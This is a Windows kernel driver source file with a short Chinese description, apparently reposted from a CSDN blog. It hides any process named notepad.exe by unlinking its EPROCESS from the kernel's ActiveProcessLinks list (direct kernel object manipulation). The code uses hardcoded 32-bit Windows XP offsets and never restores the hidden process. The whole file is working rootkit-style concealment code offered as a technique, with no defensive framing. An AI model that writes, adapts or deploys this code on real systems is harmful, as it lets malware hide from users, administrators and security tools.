驱动级别进程隐藏：在内核中把目标进程（示例为 notepad.exe）的 EPROCESS 从 ActiveProcessLinks 双向链表上摘除（DKOM），使基于该链表的进程枚举看不到它（注意：代码按进程名匹配，而不是按 PID）。



#ifndef CXX_DIRVERPROHIDE_H
#include "dirverprohide.h"
#endif

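/*
 * DriverUnload: called when the driver is being unloaded.
 *
 * It only logs. It does NOT relink any process that DriverEntry removed
 * from ActiveProcessLinks -- the neighbour pointers DriverEntry reads are
 * locals there and are kept nowhere -- so a hidden process stays hidden
 * after the driver is gone.
 *
 * DriverObject - unused.
 */
VOID
DriverUnload(__in struct _DRIVER_OBJECT *DriverObject)
{
    KdPrint(("驱动卸载成功!"));

    /* PsGetCurrentProcessId() returns a HANDLE; cast so the %d argument
     * is an integer rather than a pointer. */
    KdPrint(("PID = %d", (ULONG)PsGetCurrentProcessId()));
}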


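/*
 * EPROCESS field offsets used by this driver. They are raw, build-specific
 * constants (the values look like the 32-bit Windows XP layout:
 * UniqueProcessId 0x084, ActiveProcessLinks 0x088, ImageFileName 0x174 --
 * confirm with `dt nt!_EPROCESS` on the exact target build before loading).
 * The ULONG pointer arithmetic below is 32-bit only.
 */
enum {
    EPROC_OFF_PID   = 0x84,   /* UniqueProcessId */
    EPROC_OFF_LINKS = 0x88,   /* ActiveProcessLinks (LIST_ENTRY) */
    EPROC_OFF_NAME  = 0x174   /* ImageFileName (char array) */
};

/* Given the address of a process's ActiveProcessLinks entry, return the
 * address of that process's ImageFileName field. */
static PCHAR ImageNameFromLinks(ULONG links)
{
    return (PCHAR)(links - EPROC_OFF_LINKS + EPROC_OFF_NAME);
}

/* Given the address of a process's ActiveProcessLinks entry, return the
 * value stored in that process's UniqueProcessId field. */
static ULONG PidFromLinks(ULONG links)
{
    return *(PULONG)(links - EPROC_OFF_LINKS + EPROC_OFF_PID);
}

/*
 * Detach the ActiveProcessLinks entry at `links` from the process ring.
 *
 * The two neighbours are pointed at each other (next->Blink = prev,
 * prev->Flink = next). The entry's own Flink/Blink are then made to point
 * at itself: when the hidden process later exits, the kernel's
 * RemoveEntryList() on this entry only writes into the entry itself,
 * instead of through stale neighbour pointers that may by then refer to
 * freed EPROCESS memory. The original code left those stale pointers in
 * place.
 *
 * No lock is taken around these writes; this driver does not synchronise
 * with process creation/termination while it walks the list.
 */
static VOID UnlinkActiveProcessEntry(ULONG links)
{
    ULONG flink = *(PULONG)links;        /* next entry in the ring */
    ULONG blink = *(PULONG)(links + 4);  /* previous entry in the ring */

    KdPrint(("unlinking entry %08x: flink=%08x blink=%08x\r\n",
             links, flink, blink));

    *(PULONG)(flink + 4) = blink;        /* next->Blink = prev */
    *(PULONG)blink       = flink;        /* prev->Flink = next */

    *(PULONG)links       = links;        /* entry->Flink = entry */
    *(PULONG)(links + 4) = links;        /* entry->Blink = entry */
}

/*
 * DriverEntry: walk the ActiveProcessLinks ring starting at the calling
 * process, unlink every process whose ImageFileName contains "notepad.exe",
 * then walk the ring again to confirm the name is no longer reachable.
 *
 * pDriverObj      - driver object; only DriverUnload is filled in.
 * pRegistryString - unused.
 * Returns 0 (STATUS_SUCCESS).
 *
 * The unlink is never undone: DriverUnload does not relink the process,
 * so it stays invisible to list-based enumeration until it exits.
 */
NTSTATUS
DriverEntry(IN PDRIVER_OBJECT pDriverObj, IN PUNICODE_STRING pRegistryString)
{
    ULONG start;   /* ActiveProcessLinks of the caller; loop sentinel */
    ULONG cur;
    ULONG next;

    KdPrint(("驱动加载成功!"));
    KdPrint(("驱动是由 PID = %d 运行着!", (ULONG)PsGetCurrentProcessId()));

    start = (ULONG)PsGetCurrentProcess() + EPROC_OFF_LINKS;

    /* Pass 1: enumerate and unlink. */
    cur = start;
    do
    {
        /* Read the successor BEFORE a possible unlink: once unlinked the
         * entry points at itself and would otherwise trap the loop. */
        next = *(PULONG)cur;

        KdPrint(("进程名:%s\t\tPID:%d\r\n",
            ImageNameFromLinks(cur), PidFromLinks(cur)));

        /* Never unlink the entry we started from: it is the loop sentinel
         * and removing it would make the ring walk non-terminating.
         * strstr() relies on ImageFileName being NUL-terminated inside its
         * buffer -- TODO confirm for the target build. */
        if (cur != start && strstr(ImageNameFromLinks(cur), "notepad.exe"))
        {
            UnlinkActiveProcessEntry(cur);
            KdPrint(("发现记事本!"));
        }

        cur = next;
    }
    while (cur != start);

    /* Pass 2: re-walk the ring; the name should no longer be reachable. */
    cur = start;
    do
    {
        KdPrint(("再次扫描进程名:%s\t\tPID:%d\r\n",
            ImageNameFromLinks(cur), PidFromLinks(cur)));

        if (strstr(ImageNameFromLinks(cur), "notepad.exe"))
        {
            KdPrint(("发现记事本,隐藏失败!"));
        }

        cur = *(PULONG)cur;
    }
    while (cur != start);

    pDriverObj->DriverUnload = DriverUnload;

    return 0;
}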



转载自blog.csdn.net/h1028962069/article/details/52103336